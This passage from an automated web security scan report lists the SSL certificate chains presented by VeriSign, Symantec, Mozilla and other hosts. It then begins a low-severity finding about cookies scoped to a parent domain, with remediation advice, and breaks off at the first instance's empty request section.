Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.14. https://cdn.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cdn.verisign.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Apr 18 18:00:00 GMT-06:00 2010
Valid to:  Fri Apr 18 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.15. https://cert.webtrust.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cert.webtrust.org
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Oct 21 18:00:00 GMT-06:00 2009
Valid to:  Sun Oct 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.16. https://donate.mozilla.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  donate.mozilla.org
Issued by:  UTN-USERFirst-Hardware
Valid from:  Mon Sep 20 18:00:00 GMT-06:00 2010
Valid to:  Wed Sep 21 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:  Tue Jul 09 12:19:22 GMT-06:00 2019

8.17. https://drh.img.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://drh.img.digitalriver.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.img.digitalriver.com,ST=Minnesota
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Feb 03 08:22:35 GMT-06:00 2011
Valid to:  Fri Feb 03 08:22:35 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

8.18. https://enterprise-ssl-admin.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprise-ssl-admin.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  enterprise-ssl-admin.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Oct 22 18:00:00 GMT-06:00 2009
Valid to:  Thu Oct 13 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.19. https://idprotect.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  idprotect.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Mar 24 18:00:00 GMT-06:00 2010
Valid to:  Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.20. https://partnernet.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://partnernet.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  partnernet.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Dec 16 18:00:00 GMT-06:00 2010
Valid to:  Sun Jan 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.21. https://policy3.responsys.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.responsys.net
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun May 16 05:02:14 GMT-06:00 2010
Valid to:  Sun Jun 17 14:48:31 GMT-06:00 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.22. https://press.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  press.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Mar 02 18:00:00 GMT-06:00 2010
Valid to:  Fri Mar 02 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.23. https://products.geotrust.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.geotrust.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  products.geotrust.com
Issued by:  GeoTrust Extended Validation SSL CA
Valid from:  Sat Apr 16 15:58:45 GMT-06:00 2011
Valid to:  Sat May 18 12:50:47 GMT-06:00 2013

Certificate chain #1

Issued to:  GeoTrust Extended Validation SSL CA
Issued by:  GeoTrust Primary Certification Authority
Valid from:  Tue Nov 28 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 28 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  GeoTrust Primary Certification Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Nov 28 10:08:31 GMT-06:00 2006
Valid to:  Tue Aug 21 09:08:31 GMT-06:00 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

Certificate chain #4

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.24. https://products.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  products.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Nov 18 18:00:00 GMT-06:00 2009
Valid to:  Wed Nov 30 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.25. https://renewals.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  renewals.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Apr 25 18:00:00 GMT-06:00 2011
Valid to:  Wed Apr 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.26. https://seal.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 18:00:00 GMT-06:00 2010
Valid to:  Sun Jul 06 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

8.27. https://securitycenter.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  SECURITYCENTER.VERISIGN.COM
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Dec 27 18:00:00 GMT-06:00 2010
Valid to:  Thu Dec 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.28. https://symaccount.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symaccount.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  symaccount.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Feb 10 18:00:00 GMT-06:00 2011
Valid to:  Thu Mar 01 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.29. https://symantec-corporation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  symantec-corporation.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Mon May 16 18:00:00 GMT-06:00 2011
Valid to:  Wed May 16 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.30. https://test-products.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://test-products.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  test-products.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Nov 07 18:00:00 GMT-06:00 2010
Valid to:  Wed Nov 07 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.31. https://vipdeveloper.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipdeveloper.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vipdeveloper.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Mar 17 18:00:00 GMT-06:00 2010
Valid to:  Sat Mar 17 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.32. https://vipmanager.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmanager.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vipmanager.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Mar 07 18:00:00 GMT-06:00 2010
Valid to:  Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.33. https://vipmobile.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmobile.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vipmobile.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Dec 12 18:00:00 GMT-06:00 2010
Valid to:  Wed Dec 12 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.34. https://vs.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vs.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vs.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 27 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.35. https://www-secure.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www-secure.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Fri Oct 08 18:00:00 GMT-06:00 2010
Valid to:  Mon Oct 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.36. https://www.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue May 25 18:00:00 GMT-06:00 2010
Valid to:  Fri May 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.37. https://www4.symantec.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www4.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www4.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Nov 18 18:00:00 GMT-06:00 2010
Valid to:  Sat Nov 19 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9. Cookie scoped to parent domain  previous  next
There are 82 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://buy.norton.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

